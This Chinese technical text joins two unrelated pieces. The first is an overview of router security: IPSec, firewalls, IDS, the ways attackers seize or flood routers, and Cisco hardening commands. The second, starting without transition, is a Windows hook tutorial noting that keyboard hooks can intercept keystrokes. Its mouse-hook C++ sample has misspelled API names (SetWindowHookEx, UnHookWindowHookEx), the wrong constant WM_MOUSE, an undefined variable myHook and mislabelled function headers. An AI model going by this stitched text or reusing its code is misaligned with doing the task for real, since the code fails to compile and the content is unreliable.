　　传输加密技术：IPSec是路由器常用的协议，借助该协议，路由器支持建立虚拟专用网(VPN)。IPSec协议包括ESP(Encapsulating Security Payload)封装安全负载、AH(Authentication Header)报头验证协议及IKE，密钥管理协议等，可以用在公共IP网络上确保数据通信的可靠性和完整性，能够保障数据安全穿越公网而没有被侦听。由于IPSec的部署简便，只需安全通道两端的路由器或主机支持IPSec协议即可，几乎不需对网络现有基础设施进行更动，这正是IPSec协议能够确保包括远程登录、客户机、服务器、电子邮件、文件传输及Web访问等多种应用程序安全的重要原因。

　　防火墙防护技术：采用防火墙功能模块的路由器具有报文过滤功能，能够对所有接收和转发的报文进行过滤和检查，检查策略可以通过配置实现更改和管理。路由器还可以利用NAT/PAT功能隐藏内网拓扑结构，进一步实现复杂的应用网关(ALG)功能，还有一些路由器提供基于报文内容的防护。原理是当报文通过路由器时，防火墙功能模块可以对报文与指定的访问规则进行比较，如果规则允许，报文将接受检查，否则报文直接被丢弃，如果该报文是用于打开一个新的控制或数据连接，防护功能模块将动态修改或创建规则，同时更新状态表以允许与新创建的连接相关的报文，回来的报文只有属于一个已经存在的有效连接，才会被允许通过。

　　入侵检测技术：在安全架构中，入侵检测(IDS)是一个非常重要的技术，目前有些路由器和高端交换机已经内置IDS功能模块，内置入侵检测模块需要路由器具备完善的端口镜像(一对一、多对一)和报文统计支持功能。

　　HA(高可用性)：提高自身的安全性，需要路由器能够支持备份协议(如VRRP)和具有日志管理功能，以使得网络数据具备更高的冗余性和能够获取更多的保障。

　　 入侵路由器的手法及其对策

　　通常来说，黑客攻击路由器的手段与袭击网上其它计算机的手法大同小异，因为从严格的意义上讲路由器本身就是一台具备特殊使命的电脑，虽然它可能没有人们通常熟识的PC那样的外观。一般来讲，黑客针对路由器的攻击主要分为以下两种类型：一是通过某种手段或途径获取管理权限，直接侵入到系统的内部;一是采用远程攻击的办法造成路由器崩溃死机或是运行效率显著下降。相较而言，前者的难度要大一些。

　　在第一种入侵方法中，黑客一般是利用系统用户的粗心或已知的系统缺陷(例如系统软件中的“臭虫”)获得进入系统的访问权限，并通过一系列进一步的行动最终获得超级管理员权限。黑客一般很难一开始就获得整个系统的控制权，在通常的情况下，这是一个逐渐升级的入侵过程。由于路由器不像一般的系统那样设有众多的用户账号，而且经常使用安全性相对较高的专用软件系统，所以黑客要想获取路由器系统的管理权相对于入侵一般的主机就要困难得多。

　　因此，现有的针对路由器的黑客攻击大多数都可以归入第二类攻击手段的范畴。这种攻击的最终目的并非直接侵入系统内部，而是通过向系统发送攻击性数据包或在一定的时间间隔里，向系统发送数量巨大的“垃圾”数据包，以此大量耗费路由器的系统资源，使其不能正常工作，甚至彻底崩溃。

　　路由器是内部网络与外界的一个通信出口，它在一个网络中充当着平衡带宽和转换IP地址的作用，实现少量外部IP地址数量让内部多台电脑同时访问外网，一旦黑客攻陷路由器，那么就掌握了控制内部网络访问外部网络的权力，而且如果路由器被黑客使用拒绝服务攻击，将造成内部网络不能访问外网，甚至造成网络瘫痪。具体来说，我们可以实施下面的对策：

　　为了防止外部ICMP重定向欺骗，我们知道攻击者有时会利用ICMP重定向来对路由器进行重定向，将本应送到正确目标的信息重定向到它们指定的设备，从而获得有用信息。禁止外部用户使用ICMP重定向的命令是：interface serial0 no ip redirects。

　　在防止外部源路由欺骗时，我们知道源路由选择是指使用数据链路层信息来为数据报进行路由选择。该技术跨越了网络层的路由信息，使入侵者可以为内部网的数据报指定一个非法的路由，这样原本应该送到合法目的地的数据报就会被送到入侵者指定的地址。禁止使用源路由的命令：no ip source-route。

　　如何防止盗用内部IP地址呢?由于攻击者通常可能会盗用内部IP地址进行非法访问，针对这一问题，可以利用Cisco路由器的ARP命令将固定IP地址绑定到某一MAC地址之上。具体命令：arp 固定IP地址 MAC地址 arpa。

　　而要在源站点防止smurf，关键则是阻止所有的向内回显请求，这就要防止路由器将指向网络广播地址的通信映射到局域网广播地址。可以在LAN接口方式中输入命令：no ip directed-broadcast。

钩子函数可以截获并处理其他应用程序的消息。每当特定的消息发出，在没有到达目的窗口前，钩子程序就先捕获该消息，亦即钩子函数先得到控制权。这时钩子函数即可以加工处理（改变）该消息，也可以不作处理而继续传递该消息，还可以强制结束消息的传递。
钩子的种类很多，每种钩子可以截获并处理相应的消息，如键盘钩子可以截获键盘消息，外壳钩子可以截取、启动和关闭应用程序的消息等
关于HOOK
Hooks
A hook is a point in the system message-handling mechanism where an application can install a subroutine to monitor the message traffic in the system and process certain types of messages before they reach the target window procedure.

安装一个HOOK，SetWindowsHookEx
对每种类型的钩子由系统来维护一个钩子链，最近安装的钩子放在链的开始，而最先安装的钩子放在最后，也就是后加入的先获得控制权。
The SetWindowsHookEx function installs an application-defined hook procedure into a hook chain. You would install a hook procedure to monitor the system for certain types of events. These events are associated either with a specific thread or with all threads in the same desktop as the calling thread.
HHOOK SetWindowsHookEx(
int idHook,        // hook type.请查看MSDN获得详细信息
HOOKPROC lpfn,     // hook procedure
HINSTANCE hMod,    // handle to application instance
DWORD dwThreadId   // thread identifier
);

得到控制权的钩子函数在完成对消息的处理后，如果想要该消息继续传递，那么它必须调用另外一个SDK中的API函数CallNextHookEx来传递它。
(对一个事件处理的hook可能有多个，它们成链状，使用CallNextHookEx一级一级地调用。简单解释过来就是“调用下一个HOOK” )
CallNextHookEx
The CallNextHookEx function passes the hook information to the next hook procedure in the current hook chain. A hook procedure can call this function either before or after processing the hook information.
LRESULT CallNextHookEx(
HHOOK hhk,      // handle to current hook
int nCode,      // hook code passed to hook procedure
WPARAM wParam, // value passed to hook procedure
LPARAM lParam   // value passed to hook procedure
);

hook处理函数
LRESULT CALLBACK HookProc(
int nCode,
WPARAM wParam,
LPARAM lParam
);

取消HOOK
UnhookWindowsHookEx
The UnhookWindowsHookEx function removes a hook procedure installed in a hook chain by the SetWindowsHookEx function.
BOOL UnhookWindowsHookEx(
HHOOK hhk   // handle to hook procedure
);

示例：
[code]
// 监视鼠标消息
// hook处理函数声明
LRESULT CALLBACK MyMouseProc(int nCode, WPARAM wParam, LPARAM lParam);
static BOOL StartWatchingMouse(); // 开始监视
static void StopWatchingMouse();    // 结束
static HHOOK hHook = NULL;    //hook指针
/*======================================================
*Function:StartWatchingMouse()
*Author:wuhuiran 05-7-23
*Desc:开始监视鼠标
*Record:
--------------------------------------------------------
========================================================*/
BOOL StartWatchingMouse()
{
hHook = SetWindowHookEx(WM_MOUSE, (HOOKPROC) MyMouseProc,
   (HINSTANCE) NULL, GetCurrentThreadId());
  
if(!hHook)
{
   return FALSE;
}

return TRUE;

}

/*======================================================
*Function:StartWatchingMouse()
*Author:wuhuiran 05-7-23
*Desc:取消监视鼠标
*Record:
--------------------------------------------------------
========================================================*/
void StopWatchingMouse()
{
if(hHook)
{
   UnHookWindowHookEx(hHook);
   hHook = NULL;
}
}

/*======================================================
*Function:StartWatchingMouse()
*Author:wuhuiran 05-7-23
*Desc:HOOK处理函数
*Record:
--------------------------------------------------------
========================================================*/
LRESULT CALLBACK MyMouseProc(int nCode, WPARAM wParam, LPARAM lParam)
{
if(nCode < 0)
{
   return CallNextHookEx(hHook, nCode, wParam, lParam);
  
}

MOUSEHOOKSTRUCT *pMouseHookStruct;   //鼠标HOOK结构体
pMouseHookStruct = (MOUSEHOOKSTRUCT *)lParam;

POINT pt = pMouseHookStruct->pt;
//动一下鼠标就会显示鼠标位置
CString strMsg;
strMsg.Format("x:\t%d\ny:\t%d", pt.x, pt.y);
AfxMessageBox(strMsg);

return CallNextHookEx(myHook, nCode, wParam, lParam);
}
[/code]

注意：
hook会使系统变慢，除非必要，不要频繁使用。在不使用的时候尽快删除
全局钩子必须放在DLL中

只是简单介绍了一下钩子函数的使用方法，具体的函数介绍请参阅MSDN和其他文章。